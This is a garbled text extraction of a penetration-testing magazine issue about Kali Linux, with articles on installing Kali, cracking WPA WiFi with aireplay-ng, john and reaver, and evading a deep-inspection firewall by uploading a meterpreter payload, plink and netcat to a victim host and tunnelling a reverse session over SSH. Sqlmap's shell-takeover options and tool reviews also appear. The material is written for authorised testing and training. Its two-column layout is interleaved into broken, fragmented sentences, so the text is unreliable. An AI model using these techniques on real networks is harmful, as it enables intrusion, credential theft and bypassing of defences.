Академический Документы
Профессиональный Документы
Культура Документы
Improve your
Firewall Auditing
As a penetration tester you have to be an expert in multiple
technologies. Typically you are auditing systems installed and
maintained by experienced people, often protective of their own
methods and technologies. On any particular assessment testers may
have to perform an analysis of Windows systems, UNIX systems, web
applications, databases, wireless networking and a variety of network
protocols and firewall devices. Any security issues identified within
those technologies will then have to be explained in a way that both
management and system maintainers can understand.
he network scanning phase of a
penetration assessment will quickly
identify a number of security
weaknesses and services running on the
scanned systems. This enables a tester to
quickly focus on potentially vulnerable
systems and services using a variety of tools
that are designed to probe and examine
them in more detail e.g. web service query
tools. However this is only part of the picture
and a more thorough analysis of most
systems will involve having administrative
access in order to examine in detail how
they have been configured. In the case of
firewalls, switches, routers and other
infrastructure devices this could mean
manually reviewing the configuration files
saved from a wide variety of devices.
www.titania.com
With Nipper Studio penetration testers can be experts in You can customize the audit policy for your customers
every device that the software supports, giving them the specific requirements (e.g. password policy), audit the
ability to identify device, version and configuration device to that policy and then create the report detailing
specific issues without having to manually reference the issues identified. The reports can include device
multiple sources of information. With support for around specific mitigation actions and be customized with your
100 firewalls, routers, switches and other infrastructure own companies styling. Each report can then be saved
devices, you can speed up the audit process without in a variety of formats for management of the issues.
compromising the detail. Why not see for yourself, evaluate for
free at titania.com
www.titania.com
Dear PenTest Readers!
And this is it! Enjoy your reading, enjoy your PenTest! Whilst every effort has been made to ensure the
high quality of the magazine, the editors make
Milena Bobrowska and PenTest Team no warranty, express or implied, concerning the
results of content usage.
All trade marks presented in the magazine were
used only for informative purposes.
DISCLAIMER!
The techniques described in our
articles may only be used in private,
local networks. The editors hold
no responsibility for misuse of the
presented techniques or consequent
data loss.
KALI LINUX INTRODUCTION during the pentest. This article may not cover all features of
Armitage. However, in order to provide you a better under-
K
ali Linux is a Linux penetration testing and se- A Little History
curity auditing Linux distribution. After its re- To be very concise, Kali is an offshoot of Back-
lease in March 2013, Kali Linux has quickly track, which is an Offshoot of Whax, which is
become the new favorite among PenTesters world- itself an Offshoot of Whoppix, which is derived
wide as their choice for the PenTesting OS. Replacing from Knoppix. Something common among all of
its predecessor Backtrack, Kali incorporated several these distros is that they were focused on Digital
new features and looks quite promising. It is available Forensics and Intrusion Detection, with Backtrack
for i386 and amd64 architectures and has the same and Kali adding a whole lot of Tools for PenTest-
Minimum Hardware Requirements as Backtrack: 1 ing purposes. Backtrack has been giving ma-
GHz CPU, 8 GB of Hard Disk Space, 300 MB RAM, chine guns to monkeys since 2007, so it has had
And DVD-writer/Ability to boot with a Pen drive. a long reign as the favorite distro of PenTesters
worldwide. Offensive-Security, the creators of
Backtrack, decided to incorporate many changes
in new Backtrack 6 (as it was called at that time).
Since it was built from scratch, it was significantly
different from the older versions of Backtrack and
Offensive-Security decided to give a new name to
the Distro Kali Linux.
a d v e r t i s e m e n t
EMBEDDED LINUX
Design, Development, and Manufacturing
www.css-design.com
Communication Systems Solutions 6030 S. 58th St. STE C Lincoln, NE 68516 402.261.8688
SCENARIOS
Kali Linux
The BackTrack Successor
On March 13, Kali, a complete rebuild of BackTrack Linux, has
been released. It has been constructed on Debian and is FHS
(Filesystem Hierarchy Standard) complaint. It is an advanced
Penetration Testing and Security Auditing Linux distribution. It
adhers completely to Debian development standards. However,
one should not treat Kali Linux exactly the same as Debian.
B
ackTrack is an open-source Linux-based was built on Ubuntu, Kali Linux is built from scratch
penetration testing toolset. In Backtrack, and constructed on Debian and is FHS (Filesystem
the common tools that you needed to per- Hierarchy Standard) compliant. Improved software
form a security assessment were all packaged in- repositories synchronized with the Debian reposito-
to one nice distribution and ready to go at a mo- ries makes it easier to keep it updated, apply patch-
ments notice. BackTrack made it easy to create es and add new tools. Kali Linux can also be eas-
a new VM (Virtual Machine) from the downloaded ily customized so that it contains only the packages
ISO (International Organization for Standardiza- and features that are required. Desktop environment
tion), perform the assessment, then either archive can also be customized to use GNOME(default),
that VM (Virtual Machine) for future reference or KDE (K Desktop Environment), LXDE (Lightweight
delete it when done to remove the evidence. X11 Desktop Environment), or whatever you prefer.
Some Other Differences
Single user, root access by design: Since it Creating the Virtual Machine
has been designed for security auditing, Kali
Linux is designed to be used in a single, root Launch VirtualBox and using Virtual Machine
user scenario. Manager create a new virtual machine by click-
Network services disabled by default: Major ing New in the upper left corner.
security threats comes from various network Provide a Name for the virtual machine, OS (Op-
services running on the system. Kali Linux erating System) Type and Version. Set the Type to
is equipped with sysvinit hooks which disable Linux and the Version to Debian. Please make
network services by default. These hooks al- sure to choose the proper version 32 or 64 bit op-
low us to install various services on Kali Linux, tions for your architecture. Once completed, click
while ensuring that our distribution remains se- the continue button to move on with the setup.
cure by default, no matter what packages are Configure the amount of memory to allocate to
installed. Additional services such as Bluetooth your new virtual machine. As a minimum allo-
are also blacklisted by default. cate 2048MB. Once completed, click the Con-
Custom Linux Kernel: Kali Linux uses an up- tinue button.
stream kernel, patched for wireless injection. Next step is to create virtual machine hard drive.
The default is to Create a virtual hard drive
Since Kali is a Linux distribution specifically now. Accept the default and click the Create
geared towards professional penetration test- button in the lower right portion of the window.
ing and security auditing and as such, it is not Pick your hard drive file type. The default is
a recommended distribution for those unfamiliar VDI (VirtualBox Disk Image), however you can
with Linux. Misuse of security tools within your create any other type. For example, creating
network, particularly without permission, may a VMDK (Virtual Machine Disk) will allow you
cause irreparable damage and result in signifi- to use this hard drive with VMWare as well as
cant consequences. VirtualBox. Once you have selected your file
type, click the Continue button.
NOTE The next step gives you two options: to allo-
If you are looking for a Linux distribution to learn cate the entire amount of disk space at once,
the basics of Linux and need a good starting point, OR dynamically allocate as hard drive space is
Kali Linux is not the ideal distribution for you. You needed. Once you have made your selection,
may want to begin with Ubuntu or Debian instead. click the Continue button.
a d v e r t i s e m e n t
Kali Linux
WiFi Testing
In this article, we will explore penetration testing of a wireless
802.11 (WiFi) network using Kali Linux. We ail limit our testing
to WAP which is of more interest to professionally secured WiFi
networks. It is also beneficial for us to focus on the
command-line tools in order to provide better understanding of
the steps involved.
T
his will help us gain a deeper understanding naturally protected. WiFi networks borrow from de-
which will help us to adapt our testing be- cades of research in the field of cryptography, but
yond standard recipes. The following gener- also borrow some of the problems inherent in se-
al steps will be followed in order to better perform a cure communication systems.
WiFi security assessment and to afterward further Cryptographic systems have often solved the se-
lock-down our systems. curity problem quite easily by using encrypted data
streams and the latest cryptographic technologies.
Verify our equipment and setup Encrypting a data stream with a secret key and de-
Monitor the WiFi networks to obtain information crypting it with the same key works out quite well
about our access point (AP) under test. and can provide a high level of protection, provided
Capture AP key exchanges while injecting that certain protocols are followed. However, there
packets to force re-authentication. is much difficulty introduced in the simple method
Performing off-line key-cracking techniques on of sharing the secret key.
the captured data. Sharing a secret key or private key has been the
Use the results to improve security at our AP. target of much research and development as well
Repeat steps 3-5 until satisfied with the security. as the focal point in various security attacks. Ideally,
if you could share a private key in a private manner,
As we go through these steps, we will utilize var- the highest level of security is obtained. This might
ious tools provided by the Kali Linux distribution. involve two people meeting in a secret place and
We also are able to script these tools together and handing one to another a secret key written on a
create our own utilities as needed to aid in our pen- piece of paper. The key is then programmed into an-
etration testing. We will also briefly explore WPS other system, the paper is properly destroyed, and
exploitation, but only enough to demonstrate that the secret key is to remain a secret and never be
WPS must be disabled for proper security. shared where prying eyes could observe. Although
this is quite secure, it is also highly impractical.
WiFi Security In lieu of the previous option, we are now intro-
One of the things we must understand before at- duced with the problem of key exchange. Crypto-
tempting to secure our WiFi network is how it is graphic systems often need a way to share a key,
Kali Linux is installed to a virtual machine in or- root@kali:~ ifconfig wlan0 down
der to allow the main PC or notebook to still have
access to the network. A separate external WiFi Check that it is no longer present: Listing 3.
dongle is needed. If operating in a virtual ma-
chine, the USB dongle needs to be assigned to
the VM. The following WiFi dongle will be used:
[13134.967038] usb 1-1: new high-speed USB device number 10 using ehci_hcd
[13135.124983] usb 1-1: New USB device found, idVendor=07b8, idProduct=3070
[13135.124986] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[13135.124987] usb 1-1: Product: 802.11 n WLAN
[13135.124988] usb 1-1: Manufacturer: Ralink
[13135.124989] usb 1-1: SerialNumber: 1.0
[13135.303101] usb 1-1: reset high-speed USB device number 10 using ehci_hcd
[13135.551689] ieee80211 phy6: Selected rate control algorithm minstrel_ht
[13135.552002] Registered led device: rt2800usb-phy6::radio
[13135.552023] Registered led device: rt2800usb-phy6::assoc
[13135.552042] Registered led device: rt2800usb-phy6::quality
root@kali:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:1c:42:41:9c:da
inet addr:10.211.55.8 Bcast:10.211.55.255 Mask:255.255.255.0
inet6 addr: fdb2:2c26:f4e4:0:21c:42ff:fe41:9cda/64 Scope:Global
inet6 addr: fe80::21c:42ff:fe41:9cda/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:12406 errors:0 dropped:0 overruns:0 frame:0
TX packets:6598 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:17247605 (16.4 MiB) TX bytes:424667 (414.7 KiB)
root@kali:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:1c:42:41:9c:da
inet addr:10.211.55.8 Bcast:10.211.55.255 Mask:255.255.255.0
inet6 addr: fdb2:2c26:f4e4:0:21c:42ff:fe41:9cda/64 Scope:Global
inet6 addr: fe80::21c:42ff:fe41:9cda/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:12409 errors:0 dropped:0 overruns:0 frame:0
TX packets:6598 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:17248418 (16.4 MiB) TX bytes:424667 (414.7 KiB)
Protect BSSID STATION The -w option tells it to dump the captured data
PWR Rate Lost Frames Probe to a capture file. This file will be used in our pass-
28:C6:8E:69:A7:EE 00:15:E9:F9:76:9B -76 1 word cracking attempts. Now that it is running, at-
-36 0 9 tempt the injection again:
28:C6:8E:69:A7:EE 28:CF:E9:15:FD:C7 -16
1e- 1e 0 7 root@kali:~# aireplay-ng mon0 -a
28:C6:8E:69:A7:EE -0 1
One thing to note is if the broadcast de-authenti-
cation does not work, you should try it again with You may want to replace the injection command
the -c option to single out specific devices to de- above with the one that worked on your system.
authenticate. Next we wait for airodump-ng to report a WPA
handshake, then press CTRL-C.
root@kali:~# aireplay-ng mon0 -a Now we should see our capture files:
28:C6:8E:69:A7:EE -0 1 -c 28:CF:E9:15:FD:C7
15:59:15 Waiting for beacon frame (BSSID: root@kali:~# ls myfiles*
28:C6:8E:69:A7:EE) on channel 11 myfiles-01.cap myfiles-01.csv myfiles-01.kismet.
15:59:16 Sending 64 directed DeAuth. STMAC: csv myfiles-01.kismet.netxml
[28:CF:E9:15:FD:C7] [26|61 ACKs]
The three files, myfiles-01.csv, myfiles-01.kis-
Or course, if you are attacking your own network, met.csv, and myfiles-01.kismet.netxml, are simply
you simply need to use the MAC address of a variations of the data we see when running it live.
known laptop on your network without having to wait It is myfiles-01.cap where the full data lies.
and learn which devices are using the WiFI network. Now that we have a capture file that contains a
In short, we need to capture a WPA handshake. WPA handshake, we are done with the WiFi net-
We can obtain this handshake by simply waiting work. The remaining testing will be concerned with
until it naturally occurs or we can provoke a device uncovering the password of our network by using
into performing this handshake by injecting fake only the captured file. The password cracking may
packets that ask it to de-authenticate and thus re- take quite a bit of time, but it can be done offline
authenticate. Once we are able to provoke a WPA and in the background. It is important to remember
handshake, we are ready to repeat these tests that intruders often have much time and comput-
with logging enabled, so that we can capture this ing power. In order to protect against this, we need
data for off-line processing. to be willing to give some time to our crackers in
Additionally, there are other methods of injection of order to verify that we are secure.
which some are a bit trickier and some are only sup-
ported for WEP mode. If mode -0 fails, you may want Password Cracking
to try one of the other methods or simply wait until a Inside the myfiles-01.cap file, we have the da-
device is legitimately connected to the WiFi network. ta which contains a WPA handshake or key ex-
change. Within this handshake we have, in es-
Putting it All Together sence, an encrypted version of our WiFi password.
Now that we are able to capture a key exchange, It is this password that we seek and now we need
we will repeat this process while logging the cap- to work on this file until we can extract the pass-
tured data. We purposely did not log to a file so that word. Since we have an encrypted password, the
we can investigate what works and obtain some only reasonable method we can use to obtain it is
ESSIDs that might be susceptible to de-authenti-
cation requests. This allows us to avoid accumulat-
ing large amounts of data until we are truly ready
to begin. Everything up to this point was mostly
exploratory and now we begin the real work. Lets
first stop the airodump (CTRL-C) and restart it with
logging enabled. Figure 3. Targeted Airodump Scan Output
root@kali:~# john -w:dic-0294.txt -stdout Once this has shown that we are authenticated,
-rules we leave it running and in another terminal, start
reaver.
It is not necessary to keep cracking our WiFi net-
work at this time as we can simply use john to root@kali:~# sudo reaver -i mon0 -A -b
see if our password is solid. Lets start with dead- 28:C6:8E:69:A7:EE -vv
beef again and check it with john (Figure 5).
We may need to experiment with the -S, -N, and/
root@kali:~# john -w:dic-0294.txt -stdout or -L options to get it to work. We experiment un-
-rules | grep deadbeef til we find some settings of reaver that shows pro-
gression of the pin attempts. Next, we would let it
As we can see, deadbeef is guessed along with run for several hours and we are almost guaran-
many other variations. Ideally we might want to teed to obtain the password. Reaver will continue
find a password that john wont even guess, but until the password is found.
there is also the matter of how long will it take to
guess it. Even if john can guess the password, Locking the System Down
how long will it take? Is it long enough for us to We have thus so far went through the exercise of
consider our system secure? Furthermore, we testing WiFi susceptibility to various attacks with
can modify johns rules to create more elaborate the purpose of assessing our WiFi network. At
alterations of passwords or even create a python the end of these exercises we must come up with
script that does exactly what we want. In short, if some measures that allow us to prevent these at-
we dont know the password, we simply use john tacks from outsiders. Although we cannot com-
or a custom tool to create a password list that is pletely lock down any system that selectively al-
piped into aircrack-ng: lows outside access, our goal should be to stay
Reaver
A WiFi attack discussion is not complete without
talking about reaver. Reaver is a utility that takes
advantage of WPS to almost certainly discover Figure 5. John Password Generation
I
n the same way and same line of thought, pen- generation of the industry-leading BackTrack Linux
etration testers and hackers have that inkling or penetration testing and security auditing Linux dis-
feeling when they first fire up Kali Linux. Secu- tribution. Many penetration testers and serious
rity Tools. Lots of Security Tools. The entire dis- hackers use Linux-based open source penetration
tribution is built from the ground up for penetra- test tools from which to launch their attacks. Kali
tion testers and hackers. It comes preloaded with Linux contains a number of tools that can be used
numerous security tools that are installed, config- by security professionals during a security assess-
ured, and ready to be used. Kali Linux is the new ment process and vulnerability assessment. In this
Hex 1234567E3136382E1234502E313A6F77617370753456
Figure 14. OWASP-ZAP 7817373776F72643A31353A3538
Base64 MTkyLjE2OC4xBYuicfKpvd2FzcHVzZXI6cGF
zc3dvcmQ6MTU6NTg=
MD5 03c2fc7f0a809afd457120bd34dd40aaa
Figure 20. Hydra GUI (xHydra) in Kali Figure 22. Burp suite
Penetration Testing
with Linux
Penetration testing with Linux is one of the best ways to perform
tests. It is a versatile tool. Linux comes in many flavors like
Backtrack5 RC3 or now Kali. Linux allows the customization of
the software itself plus the tools that you use. Therefore, the
customization and level of sophistication is limitless. This article
will cover using Backtrack5 RC3 and Armitage as it is executed
during the pentest.
T
his article may not cover all features of Ar- chose to use Kali in this article to show you some-
mitage. However, in order to provide you a thing recent but the other versions of Linux are still
better understanding of Amritage, Kali will very good tools to use in the field.
be used as well in different screenshots. Note that Backtrack comes loaded with metasploit and as
Armitage is no longer supported under Backtrack you know in order to find and run an exploit you
with the recent release of Kali in early 2013. We have to switch to the directory and run the com-
Listing 3. Results: Images from core business application were not being sent to our laptop despite driftnet running
Also the GUI was used to pick target client Win- Results
dows 7 machine 10.10.10.7 and second target the We were able to log keystrokes and take screen
application server 10.10.10.5 (Listing 1). shots of the users computer. This is one way data
could be captured. In this test, we show that key
Results sslstrip logging and screen captures are possible; however,
No data or text of any sort was visible, since all data they are not very effective as shown below, Figure
was being passed through an encrypted channel. 7. Anything that was operating on the application
level of the OSI model remained visible and the tool
Results with dsniff worked. When things went encrypted at the network
Web addresses were visible, but no usernames or level it was impossible to see (Figure 4-7).
passwords. These results show that the applica- We have seen before that the desktop can be
tion is very secure. captured with screen shots and information could
be leaked this way. However, notice in the image
Results with driftnet nr 7 that the application icon is present as a big S
There were no pictures or images of the site going in the toolbar, and on the workstation it is in the
across. There were web addresses being listed. foreground. However, the image reveals that it is
not seen and therefore encrypted to the reverse
Results with urlsnarf tcp shell. That S represents the businesss core
The only thing that came through here was some business application. The launch html page is the
local address space and some internet address only visible part of the application, which is done
space redacted for publication. Still there were no on port 80. This demonstrates that the application
real gems of information for quick gains (Listing 2). running on the computer was able to encrypt all
Executed commands (example): activity for queries, results, and navigation.
Meterpreter
Meterpreter used in with Armitage, the connection
made it impossible to glean any data or provide a
way to leak data out; Meterpreter was used in this
test. Knowing the administrator password, the con-
nection was possible. Even a regular user with a
known password would be able to both pass the
hash dump and crack passwords later in order to
attempt to escalate privileges. Time being the fac-
tor is how successful the cracker would be by go-
ing slow and password cracking. Figure 5. Email Credentials Entered
A
t this point, my attack vector was very clear: To solve the problem, I used encryption, since a
Upload and run a meterpreter payload to firewall can just inspect the packets in clear, but
get a remote session. not encrypted. To ensure packets were encrypted
end-to-end (from compromised machine to my lo-
Escalate privileges on the remote host. cal machine), I used an SSH tunnel, successfully
Capture the hash of the Administrator to use achieving my goal of bypass that security barrier.
it on other hosts. In this article I will try to explain step by step all
Use a Delegation Auth Token of a Domain the processes involved to bypass the deep in-
Admin user to impersonate it, and use it to cre- spection firewall and achieve a meterpreter ses-
ate a Domain Administrator user. sion with the remote host. The reason for wanting
Use the host as gateway to access other hosts a meterpreter session is the ease with which you
and servers on LAN. can escalate privileges and pivot to other hosts
from Metasploit Framework.
By testing the above attack vector, some prob- The process is summarized as follows:
lems were detected that had to be solved to
achieve the ultimate goal. Raise the necessary tools to the remote host.
The main problem was that after getting up one re- Establish ssh tunnel forwarding the needed
verse payload of meterpreter in the host and run it, ports.
the reverse connection did not reach its destination. Launch meterpreter payload through the tun-
My first thought was a firewall was blocking ac- nel.
cess to unusual ports, so I repeated the process Receive meterpreter session on the other side
this time using a payload trying to connect to port of the tunnel.
80 of my machine, but neither worked.
The same test using netcat worked, so I fig- How to upload the payload?
ured out that problem was related with the firewall When we have access to a Linux system, usually
blocking meterpreter packages probably for be- have no problem to upload files to, because normal-
ing a Deep Inspection Firewall with the signa- ly any Linux distribution comes with wget or curl,
tures of meterpreter in its signature file. so we just need a web server to publish the binaries
ssh L <local port>:<remote host>:<remote port> ssh R <server port to open>:<remote host>:<remote
<gateway> port> <server>
This example creates a SOCKS proxy on port C:\>echo y | plink.exe l user pw password SSH-
9050 on the local host from which we can reach SERVER
any port of any host within the SSH Server LAN
(we can reach any host the SSH Server host can The command will invoke plink.exe and when
reach). asked if you want to add the unknown server key to
Following with the same scenario, now we config- the cache, it will pass the character y and plink will
ure proxychains to use the port 9050 of localhost, save the key and will go with its normal execution.
and then reach the terminal server at 192.168.0.11 Since then, we have gotten the remote host key
with the following command: in the host putty cache, which can be found on
Windows registry, in the key HKEY_CURRENT_
root@kali:~# proxychains rdesktop 192.168.0.11 USER\Software\SimonTatham\PuTTY\SshHost-
Keys. If you need to open a second SSH tunnel
OpenSSH and Putty against the same host, invoke the echo y is no
After seeing how SSH tunnels work, it is quite clear longer necessary.
that what we need to make the connection from Well, suppose the following scenario (for demo
the remote host to our attacking host, using local purposes we use two private IP address ranges.
port forwarding to open a port on the remote host 10.10.0.x stands for public addresses):
that connect to a port of our local host.
SSH is an interactive command. When we in- Public IP attacker machine: 10.10.0.10
voked it to connect to a remote host, first check the Firewall public IP: 10.10.0.20
RSA signature of the host and if it does not know Network IP LAN: 192.168.65.0/24
that host, asks if you want to connect. If yes, then Private IP Firewall: 192.168.65.254
asks the password for the user you specified when Private IP from host behind the firewall:
invoking the command. 192.168.65.10
When working from a console achieved via net- Private IP from second host behind the firewall:
cat or directly from SQL injection, we cant use 192.168.65.15
this type of interactive commands because do not
have access to the various standard file descrip- First, we create our meterpreter payload pointing
tors and therefore the command will wait for a re- to port 6666 of 127.0.0.1 (localhost). This payload
sponse that can not be sent. when invoked from a Windows host will make a
To fix this, we can invoke ssh (were talking spe- connection to itself (127.0.0.1) on port 6666.
cifically about OpenSSH, which is the most widely
used SSH package on Linux http://www.openssh.
org/) with the -o UserKnownHostsFile =/dev/null
-o StrictHostKeyChecking=no to not check the sig-
nature of the remote server, and also in the case
of ssh Unix/Linux, we can put the public RSA key
of the user who attempt to connect to the remote Figure 2. The creation of a meterpreter reverse tcp shell in
binary form with msfvenom
host in the file .authorized_keys so we do not ask
for the password. We upload this payload, plink.exe and nc.exe
In this case, we will use plink.exe from Windows. to the victim host. Once uploaded the three files,
Here you can specify the -l user -pw password to first make a connection with netcat to have a con-
pass the username and password without having sole where execute commands cause will always
to copy the RSA keys. be more comfortable than any SQL injection or
Plink is the command line version of an SSH PHP Shell.
client known as Putty, widely used in Windows Note that the connection to our host comes
environments. Plink offers no parameter to avoid from 10.10.0.20, but the IP of the remote host is
checking server key, so first time we connect to 192.168.65.10. That is cause the host is behind a
a new host will show the save RSA message. NAT Firewall.
Figure 3. Establish a remote session using netcat Figure 6. Configuration of the Metasploit multi handler to
get the reverse meterpreter session
Now using plink.exe we must create an SSH Once the entire stage set, just execute the pay-
tunnel to connect the port 6666 of the remote host load met.exe on the remote box. Once executed,
(compromised host) to port 6666 on the local host the handler on the local host will receive the con-
(port numbers can be any, but then you have to nection and send the stage for opening the ses-
create the payload to use those you decide). sion. The following picture shows it.
K
ali Linux is designed as a single-purpose more or less. Some of the tool links are to sections
tool-kit for network penetration testing and of a single tool for instance: there are several links
forensic audit, so it is missing some of the to different areas of the Metasploit Framework; and
more general applications. There are no games there are links to start and stop Apache2 HTTPD,
visible in the main menu on Kali by default, though MySQL, Metasploit, OpenVAS, BeeF, Dradis and
you might have so much fun with the content of the SSH-server. As you will see below, Metasploit
Kali directory (Figure 2) that you never really no- Framework gets its own subcategory.
tice the lack. The security applications are listed in
by category and subcategory. There are 432 tools, Kali Categories and Sub-Categories
Top 10 Security Tools
Review
From hosts to users to emails and messages to
infrastructure and even weapons, Maltego gives
you a way to visualize your environment in a very
information-rich way. Maltego lets you track rela- Figure 6. Metasploit
tionships and entities in 11 different ways and lets
you visualize them all three ways; main view, buble The first time you go to https://localhost:3790/
view and as an asset list. Very interesting tool. you see a new-user registration. Once your pass-
word is approved, Metasploit lets you insert the
Metasploit Framework key code you got through registering on their site.
http://www.metasploit.com/
Description (from the project site)
Reduce the risk of a data breach by download-
ing our penetration testing solutions. Discover how
vulnerabilities become real risks as you test the
defenses of your own network, using the same
methods as an outside attacker. Our penetration
testing software gives you a clear view as to what
vulnerabilities can easily be exploited within your
environment so you can focus on the most critical
vulnerabilities.
Safely simulate attacks on your network to un-
cover pressing security issues. Use with Nexpose
to assess and validate security risks in your en-
vironment. Verify your defenses, security controls
and mitigation efforts. Manage phishing exposure,
and audit web applications.
Review
Figure 8. Nmap NMap, which has been around since 1996, is one
of the main open-source tools in any network ad-
The first step of the Metasploit scan is a Discov- ministrator's toolbox. This researcher has used
ery phase, which initiates an NMap -A T4 IP-range NMap for mapping networks, checking for running
test (Figure 9) and then proceeds through NetBI- services, troubleshooting connectivity problems
OS probes and about 100 other tests. and checking network routes available for about
After the Discovery phase, you have an analy- ten years (Figure 10).
sis of hosts, ports open, services, vulnerabilities The basic command-set is pretty easy to learn,
and data captured. In the test network there were and the documentation is very good. The only
5 hosts and 27 services running on open ports, but thing NMap won't do is map a network by NetBIOS
no listed vulnerabilities. Rest assurred, the aver- names and return IP addresses.
age LAN would have a few vulnerabilities.
Nmap
http://nmap.org/
Review
The OWASP Zed Attack Proxy needs Java7. The
interface is simple and works pretty quickly. The
image below shows a spidering attack on a site.
There are over 3400 URIs on the site (Figure 13).
You can also send tailored HTTP requests and
responses with OWASP-ZAP.
SQLmap
http://sqlmap.org/
Description (from the project site)
sqlmap is an open source penetration testing tool
that automates the process of detecting and exploit-
ing SQL injection flaws and taking over of database
Figure 12. ZenMap
sqlmap.py -h Enumeration
These options can be used to enumerate the
Options: back-end database management system informa-
tion, structure and data contained in the tables.
-h, --help Show basic help message and exit Moreover you can run your own SQL statements
-hh Show advanced help message and exit
--version Show program's version number and exit -a, --all Retrieve everything
-v VERBOSE Verbosity level: 0-6 (default 1) -b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
Target: --current-db Retrieve DBMS current database
At least one of these options has to be provided --passwords Enumerate DBMS users password
to set the target(s) hashes
--tables Enumerate DBMS database tables
-u URL, --url=URL Target URL (e.g. "www.target. --columns Enumerate DBMS database table col-
com/vuln.php?id=1") umns
-g GOOGLEDORK Process Google dork results --schema Enumerate DBMS schema
as target URLs --dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables
Request: entries
These options can be used to specify how to -D DB DBMS database to enumerate
connect to the target URL -T TBL DBMS database table to enumerate
-C COL DBMS database table column to enu-
--data=DATA Data string to be sent through POST merate
--cookie=COOKIE HTTP Cookie header
--random-agent Use randomly selected HTTP Us- Operating system access:
er-Agent header These options can be used to access the back-
--proxy=PROXY Use a proxy to connect to the tar- end database management system underlying
get URL operating system
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly --os-shell Prompt for an interactive operating
system shell
Injection: --os-pwn Prompt for an OOB shell, meterpreter
These options can be used to specify which pa- or VNC
rameters to test for, provide custom injection pay-
loads and optional tampering scripts General:
These options can be used to set some general
-p TESTPARAMETER Testable parameter(s) working parameters
--dbms=DBMS Force back-end DBMS to this value
--batch Never ask for user input, use the default
Detection: behaviour
These options can be used to customize the de- --flush-session Flush session files for current
tection phase target
IN SOME CASES
nipper studio
HAS VIRTUALLY
REMOVED
the
NEED FOR a
MANUAL AUDIT
CISCO SYSTEMS INC.
Titanias award winning Nipper Studio configuration
auditing tool is helping security consultants and end-
user organizations worldwide improve their network
security. Its reports are more detailed than those typically
produced by scanners, enabling you to maintain a higher
level of vulnerability analysis in the intervals between
penetration tests.
www.titania.com
EXTRA
Interview with
Demstenes Zegarra
Rodrguez
Demstenes Zegarra Rodrguez is a Ph.D. student in Electronic
Systems at University of Sao Paulo, with solid knowledge in
Telecommunication Systems and Computer Science based on 13
years of professional experience in important companies such as,
Nokia, Microsoft, Celltick, Telefonica.
Since when have you been using Kali and What are you using it for?
what convinced you to it? In the present, I am analyzing the time period to
I have used the BackTrack Linux since 2009 and crack wireless passwords and their computation-
nowadays I am using Kali because of the secu- al efforts. As a future work, I pretend to study the
rity and testing tools association, with more than forensic tools of Kali Linux, because the focus of
300 penetration testing tools, including vulner- the distribution is the penetration testing tools, so I
ability analysis, web applications, password at- want to study if Kali Linux is a complete solution for
tacks, wireless attacks, exploitation tools, sniffing forensic purposes too.
and spoofing, reverse engineering, stress testing,
hardware hacking, forensic, and others. Which methods do you most frequently
use?
What are the positive and negative I am using a trivial wireless method with the tools
aspects of Kali you noticed? aircrack-ng, aireplay-ng, airmon-ng, and airod-
The positive aspects are that Kali has common ump-ng; but, in the next studies I will pretend to
tools as Wireshark, nmap until VoIP tools as rtp- use all the forensic tools through the Forensic
flood and sipmyknife. Then, Kali can be consid- Boot option to the operating system, using more
ered as a penetration testing platform that pro- than one method.
vides many features.
I have installed Kali Linux on some computers What difficulties might surprise a new
with no automatic support to some hardware such user? What can you advise them?
as video card, but it can be a little common in some The difficulties is only drivers support and the abil-
Debian-based distributions. ity to work with the penetration tools, because in
many cases the users have to use the association
Does Kali serve you for private or of more than one tool to have good results to dis-
professional purposes? cover vulnerabilities of softwares and hardwares.
I use Kali Linux for academic studies, to analyze
tool performances, such as attack time and effi- What can you say about the basic tools?
ciency using different wireless security protocols. The basic tools are extensively used by network
As an example, you can see a case study at the and system administrators, as nmap, Wireshark,
final of this interview. chroot, and in a lot of distributions the tools are
EXTRA 05/2013(16)
EXTRA
I
n this article we will try to shed some light on Penetration Testing Execution Standard
how Kali can be used with a penetration test- (PTES): Standard for penetration testing exe-
ing methodology to streamline the penetration cution along with technical guidelines.
testing process and create a stronger deliverable National Institute of Standards and Technolo-
for the client. While Kali provides a categorization gy: Guide to Security Testing and Assessment
of tools we will take this a step further and pro- (NST 800-115): Guide for conducting techni-
vide clear mapping against a standard penetra- cal security assessments. Contains guidance
tion testing methodology. Along the way we will on techniques and methods that an assessor
look at many tools from a high level as they per- should use when performing an Information
tain to the steps within the methodology. In this Security Assessment.
article we will look at the tools in a high level and
focus specifically on how to utilize the tools within While all three are good methodologies we find
a structured penetration test. We will also visit a that PTES and NIST 800-115 provide a bit more
few of our favorite tools we like to use during our flexibility during our penetration tests. Also, the
penetration tests. methodologies more closely align with whats
taught in security course curriculum such as
The Methodology SANS. For this article we will be using NIST 800-
We cant begin an article about mapping Kali to 115. Both PTES and NIST are similar so it should
a penetration testing methodology without first se-
lecting the methodology. When it comes to pen-
etration testing methodologies you can basically
narrow the field down to three. These are:
Reporting
Lastly, we need to take all the data from various tools
as well as our manual observations and screen-
shots to create a report. A typical penetration test
report will have two audiences. A non-technical au-
dience that needs enough details to understand the
problem and make management level decisions to
address the risk (think resources and budget) and
the technical audience who will be responsible for Figure 3. Dradis Initialization
mitigating the findings (Table 12).
Discovery
We decide to kick-off the Discovery phase by run-
ning TheHarvester. TheHarvester is written by Chris-
tian and allows us to collect information about a tar-
get organization from a variety of sources including
Google, Facebook, LinkedIn, spoke, etc. Lets take a Figure 5. TheHarvester Options
look at the TheHarvester a bit closer (Figure 5).
The screenshot shows TheHarvester options
and some example usage. In the next example
well run TheHarvester against our target domain
querying Bing. We also want to ensure we limit our
return results to 100. The command and its output
would look something like: Figure 6.
With these options selected TheHarvester will
query Bing for our domain looking for email ad-
dresses as well as additional linked domains. The
-n -t options tells TheHarvester to perform reverse
DNS lookups on the IP range identified for the do- Figure 6. TheHarvester Output
main queried as well as expand the search for our
domain across all top level domains. For example,
if out domain was nbc.com it would attempt for find
